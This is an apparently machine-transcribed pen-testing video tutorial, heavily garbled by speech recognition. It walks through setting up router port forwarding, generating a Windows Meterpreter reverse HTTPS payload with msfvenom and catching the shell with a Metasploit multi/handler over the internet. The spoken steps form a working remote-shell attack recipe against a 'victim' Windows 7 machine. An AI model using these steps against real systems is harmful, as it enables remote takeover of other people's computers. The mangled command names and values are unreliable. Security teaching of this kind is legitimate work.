字幕表 動画を再生する 英語字幕をプリント Hey, guys, what's up? Welcome to experience Tech. I'm beneath. And today's video is a long overdue pen testing video. No. One of the subscribers off X P s Tec Channel committed on one of the video that most pen testing tutorial shows hack over local area network or overland and which, of course, you don't work over. Why did you network And he wanted to know how to pull off these Hank's over the Internet. So in today's video will check out how to do your medicine Floyd hack over the Internet or over wider network by configuring are setting on your outer called Port Forwarding. All right, so let's begin today's video, All right. First of all, the reason why your land Hank's do not work over the Internet is because the I p address that you see when you do I f config on your next machine or I p. Conflict on your Windows machine is a local I P address, which is given to your computer by your router. And it's not the public I p address that goes or the Internet. No, there are several ways to find out of public I p address the easiest one is to search. What's my pee in Google and that will give you your public i p address? No, I cannot show you my entire I p address. However, for the purposes of demonstration, I'm just going to show you first octave off my public i p address. Now, in order to make or met exploit land hack work over the internet, we need to create a sort of bridge that will send all the traffic coming on to a specific port on public i p address to a port on the private I p address. This is done by a setting on your rotor called port forwarding. All right, so let me go to my home rotor page and show you how to do put forward. So it's 192.168 dot 1.1. All right, I'm using dealing de sl 27 30 you router. You might be using some other auto, So just look for these settings on your outer page in dealing wrote under the advanced Hamp, you have the setting for port forwarding. It's right here. Let me maximize this. All right. The first option is to give the service name. There are some comments of its name that I listed here. You can't even give your own user defined service name. So I'm just gonna type in test and the protocol you can give you tippy if you're doing a European hack, But I'm just going to leave it to TCP or it Next is the van setting. I'm just gonna leave it toe interface and then the van into faces. Point to point protocol away. Internet. I'm just gonna leave it as it is. Next is a van port. This is the poor that we want to forward. So I'm just gonna give it 443 which is the issue tps sport. And the next is the land open port, which is a poor that will receive all the traffic from your van port. So I'm gonna type for 43 here as well. Next easy land. I p address. This is your local I p address off your Colleen next machine. So I'm just gonna type in 192.16 seat. Don't 1.6. All right. All right. So that's about it. Now click on add. No. As you can see, the port forwarding table has our latest port forwarding entry. All right, so that was all that you need to configure on your router page. All right, Now, let's check if this works. Now, what I'm going to do now is I'm gonna create a simple, basic payload using MSF venom. And then I'm gonna transfer the malicious payload to of Windows seven machine, which is gonna be our victim's machine. And then we're gonna run that malicious payload there and see if we get a matter bridge Rochelle back. All right, so let's quickly create a very basic payload to do that Type MSF venom. Give us space dash p the pillow that we're gonna use his windows Metter Predator Reverse s u T P s. And then l host is going to be our public i p address. So it's 117 Don't blah blah blah. Don't blah blah and dot Yeah, blah, blah. All right. Next is the airport. No, this is the board that were forwarded, which is 443 and then and then the file that we wanted to create a z e x e fine. And then the output Next is the output directory where we want to save over payload. So I'm gonna save it in temp slash test dot e x e Now, press enter. All right, so that successfully created or payload. Let's go to the temp directory and check if it is available, dear. So here we have our malicious Fine. Next is to transfer it to our victim's computer, which have already done. Now, let me go to the victim's machine, which is the window seven box. And as you can see, I already have the test files copied to the desktop before I run this. Fine. Let's quickly start our reverse handler. So let's do MSF console. All right, so let's use exploit multi handler, no options. All right, let's set the payload as Windows Mentor Predator, Reverse https options. All right, Now let's set the l host as our public i p address. So it's gonna be 117 Don't don't on DDE don't stand. Press enter Said D l port as for for three. Okay, now one more setting that you need to do here is sent to D reverse listener Bind. Sorry. Address. There should be a local I p address which is 192 don't 168.1 dot six. In my case, what this will do is this Maddox Pride will not be able to buy into your public i p address and then it'll fall back to the local I p. Address off your colleague the next machine. All right, so now press enter and then run. Exploit. All right, so now our reverse handler is ready for the connection. No. Let's go to the victim's window seven machine and run the payload. All right, so here I am on my window. Seven computer. Not before I run the test payload. Let me show you the i P address on the public I p address off this computer. So let's go to google dot com and type in. What's my P? As you can see, the public I p address off this computer starts from 1 82 rs. Now let's run the payload and see if this work. All right. So as you can see on the calorie next box, we already have a matter of frustration. One opened, and we have the i p address. And this is from I p address 1 82 So this is how you do your meta printer hack over the Internet using port forwarding? All right, so that was all for today. Thank you guys for watching this. If you like this video kindly. President, Like Britain? If you have any comment, a tradition, please. Time that indie comment box. Thank you again for watching, and I'll see you next time.